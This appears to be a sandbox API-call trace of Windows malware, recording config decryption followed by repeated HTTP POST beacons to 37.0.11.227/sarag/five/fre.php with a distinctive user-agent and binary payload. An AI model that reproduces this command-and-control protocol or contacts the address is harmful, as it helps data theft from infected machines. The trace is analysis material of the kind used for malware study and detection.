[0229.522] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0229.523] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0229.523] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0229.523] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0229.524] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0229.524] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0229.524] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0229.525] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0229.525] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0229.525] GetProcessHeap () returned 0x690000 [0229.528] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0229.528] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0229.528] GetProcessHeap () returned 0x690000 [0229.529] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0229.529] GetProcessHeap () returned 0x690000 [0229.529] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0229.529] GetProcessHeap () returned 0x690000 [0229.530] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0229.530] GetProcessHeap () returned 0x690000 [0229.530] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0229.530] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0229.532] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0229.542] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0229.543] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0229.547] GetProcessHeap () returned 0x690000 [0229.547] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0229.548] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0229.548] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0229.549] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0229.549] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0229.550] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0229.550] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0229.550] GetProcessHeap () returned 0x690000 [0229.551] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0229.552] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0229.552] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0229.555] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0229.555] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0229.555] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0229.556] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0229.556] GetProcessHeap () returned 0x690000 [0229.556] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0229.556] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0229.557] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0229.557] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0229.558] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0229.558] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0229.558] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0229.559] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0229.559] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0229.559] GetProcessHeap () returned 0x690000 [0229.559] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0229.559] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0229.560] GetProcessHeap () returned 0x690000 [0229.560] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab360 [0229.560] socket (af=2, type=1, protocol=6) returned 0x5e0 [0229.560] connect (s=0x5e0, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0229.584] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0229.584] GetProcessHeap () returned 0x690000 [0229.584] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af100 [0229.584] GetProcessHeap () returned 0x690000 [0229.584] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b67a8 [0229.585] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0229.586] wvsprintfA (in: param_1=0x6b67a8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0229.586] GetProcessHeap () returned 0x690000 [0229.586] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afd40 [0229.586] GetProcessHeap () returned 0x690000 [0229.587] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b67a8 | out: hHeap=0x690000) returned 1 [0229.587] GetProcessHeap () returned 0x690000 [0229.587] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4460 [0229.587] GetProcessHeap () returned 0x690000 [0229.587] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b67a8 [0229.588] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0229.588] wvsprintfA (in: param_1=0x6b67a8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0229.588] GetProcessHeap () returned 0x690000 [0229.588] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0229.588] GetProcessHeap () returned 0x690000 [0229.589] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b67a8 | out: hHeap=0x690000) returned 1 [0229.589] send (s=0x5e0, buf=0x6ad508*, len=242, flags=0) returned 242 [0229.589] send (s=0x5e0, buf=0x6aba40*, len=159, flags=0) returned 159 [0229.590] GetProcessHeap () returned 0x690000 [0229.590] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0229.590] recv (in: s=0x5e0, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0229.663] GetProcessHeap () returned 0x690000 [0229.663] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0229.664] GetProcessHeap () returned 0x690000 [0229.664] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4460 | out: hHeap=0x690000) returned 1 [0229.664] GetProcessHeap () returned 0x690000 [0229.664] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afd40 | out: hHeap=0x690000) returned 1 [0229.665] GetProcessHeap () returned 0x690000 [0229.665] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af100 | out: hHeap=0x690000) returned 1 [0229.665] closesocket (s=0x5e0) returned 0 [0229.665] GetProcessHeap () returned 0x690000 [0229.665] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab360 | out: hHeap=0x690000) returned 1 [0229.666] GetProcessHeap () returned 0x690000 [0229.666] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0229.666] GetProcessHeap () returned 0x690000 [0229.666] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0229.666] GetProcessHeap () returned 0x690000 [0229.666] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0229.667] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xee8) returned 0x5e0 [0229.668] Sleep (dwMilliseconds=0xea60) [0229.669] GetProcessHeap () returned 0x690000 [0229.669] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0229.670] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0229.670] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0229.676] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0229.676] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aed48) returned 1 [0229.681] GetProcessHeap () returned 0x690000 [0229.681] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8970 [0229.681] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0229.682] CryptImportKey (in: hProv=0x6aed48, pbData=0x6a8970, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0229.682] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0229.683] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0229.683] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0229.683] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0229.684] GetProcessHeap () returned 0x690000 [0229.684] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8970 | out: hHeap=0x690000) returned 1 [0229.685] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0229.686] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0229.687] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0229.687] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0229.694] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0229.695] CryptReleaseContext (hProv=0x6aed48, dwFlags=0x0) returned 1 [0229.695] GetProcessHeap () returned 0x690000 [0229.695] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0229.695] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0229.696] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0229.698] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0229.698] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0229.699] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0229.699] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0229.700] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0229.700] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0229.700] GetProcessHeap () returned 0x690000 [0229.700] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0229.700] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0229.700] GetProcessHeap () returned 0x690000 [0229.701] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0229.701] GetProcessHeap () returned 0x690000 [0229.701] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0229.701] GetProcessHeap () returned 0x690000 [0229.702] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0229.702] GetProcessHeap () returned 0x690000 [0229.702] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0229.702] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0229.703] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0229.707] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0229.707] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0229.713] GetProcessHeap () returned 0x690000 [0229.713] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0229.713] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0229.714] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0229.715] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0229.715] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0229.715] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0229.716] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0229.716] GetProcessHeap () returned 0x690000 [0229.716] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0229.717] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0229.717] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0229.719] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0229.720] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0229.720] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0229.720] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0229.720] GetProcessHeap () returned 0x690000 [0229.720] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0229.721] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0229.721] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0229.722] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0229.722] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0229.723] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0229.723] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0229.723] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0229.724] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0229.724] GetProcessHeap () returned 0x690000 [0229.724] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0229.724] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0229.724] GetProcessHeap () returned 0x690000 [0229.724] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4d0 [0229.724] socket (af=2, type=1, protocol=6) returned 0x5e4 [0229.724] connect (s=0x5e4, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0229.750] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0229.750] GetProcessHeap () returned 0x690000 [0229.751] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0229.751] GetProcessHeap () returned 0x690000 [0229.751] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b67a8 [0229.751] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0229.752] wvsprintfA (in: param_1=0x6b67a8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0229.752] GetProcessHeap () returned 0x690000 [0229.752] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0280 [0229.752] GetProcessHeap () returned 0x690000 [0229.753] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b67a8 | out: hHeap=0x690000) returned 1 [0229.753] GetProcessHeap () returned 0x690000 [0229.753] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0229.753] GetProcessHeap () returned 0x690000 [0229.753] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b67a8 [0229.754] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0229.754] wvsprintfA (in: param_1=0x6b67a8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0229.754] GetProcessHeap () returned 0x690000 [0229.754] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0229.754] GetProcessHeap () returned 0x690000 [0229.755] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b67a8 | out: hHeap=0x690000) returned 1 [0229.755] send (s=0x5e4, buf=0x6ad508*, len=242, flags=0) returned 242 [0229.755] send (s=0x5e4, buf=0x6aba40*, len=159, flags=0) returned 159 [0229.755] GetProcessHeap () returned 0x690000 [0229.755] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0229.755] recv (in: s=0x5e4, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0229.847] GetProcessHeap () returned 0x690000 [0229.847] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0229.848] GetProcessHeap () returned 0x690000 [0229.848] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0229.848] GetProcessHeap () returned 0x690000 [0229.848] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0280 | out: hHeap=0x690000) returned 1 [0229.849] GetProcessHeap () returned 0x690000 [0229.849] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0229.852] closesocket (s=0x5e4) returned 0 [0229.853] GetProcessHeap () returned 0x690000 [0229.854] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4d0 | out: hHeap=0x690000) returned 1 [0229.854] GetProcessHeap () returned 0x690000 [0229.854] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0229.854] GetProcessHeap () returned 0x690000 [0229.855] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0229.855] GetProcessHeap () returned 0x690000 [0229.855] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0229.856] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x750) returned 0x5e4 [0229.866] Sleep (dwMilliseconds=0xea60) [0229.869] GetProcessHeap () returned 0x690000 [0229.869] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0229.869] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0229.870] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0229.878] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0229.879] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0229.886] GetProcessHeap () returned 0x690000 [0229.886] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0229.887] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0229.887] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0229.888] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0229.888] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0229.895] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0229.895] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0229.895] GetProcessHeap () returned 0x690000 [0229.896] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0229.896] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0229.897] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0229.900] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0229.900] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0229.901] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0229.901] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0229.901] GetProcessHeap () returned 0x690000 [0229.901] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0229.902] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0229.902] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0229.903] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0229.904] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0229.904] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0229.905] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0229.906] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0229.906] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0229.906] GetProcessHeap () returned 0x690000 